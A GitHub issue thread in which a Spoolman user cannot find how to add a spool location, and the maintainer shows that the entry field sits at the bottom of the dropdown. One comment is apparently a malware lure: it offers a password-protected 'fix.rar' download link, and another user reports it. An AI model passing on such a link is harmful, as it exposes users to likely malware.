### ISSUE TITLE
Can not add location to spoolman

### ISSUE THREAD

**Issue by smokin76** [Donkie/Spoolman#462]
I installed spoolman via kiauh on my printer and can add spools, filaments and manufactures but no location.

1. Go to Spools
2. Click on "Create"
3. Scroll down to "Location"
4. Click the List
5. List contains "No data" and i can not add any new location

**Expected behavior**
I only want to know how to add a location.

**Spoolman Host (please complete the following information):**
 - Installation type: KIAUH so i assume StandAlone
 - Installed version: 0.19.3
 - OS and Distro: Klipper
 - Database type: SQLite

**Desktop (please complete the following information):**
 - OS: Windows
 - Browser: Chrome

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mkevenaar** [comment]
@smokin76 I reported the content to GitHub

**Comment by Donkie** [comment]
This doesn't work for you?


https://github.com/user-attachments/assets/acd91111-7490-4d86-a70f-112ae6fb036d

**Comment by smokin76** [comment]
That‘s it. I assume glasses and the dark theme did not let me see the input field. Thanks a lot for pointing it out.

**Comment by spikeygg** [comment]
lol, I feel dumb writing this but I had the same question. I searched the internet for help -- it's definitely not obvious that the location creation box is at the bottom of the selection dropdown. I even looked in there first and didn't see the "Enter New Location" field...
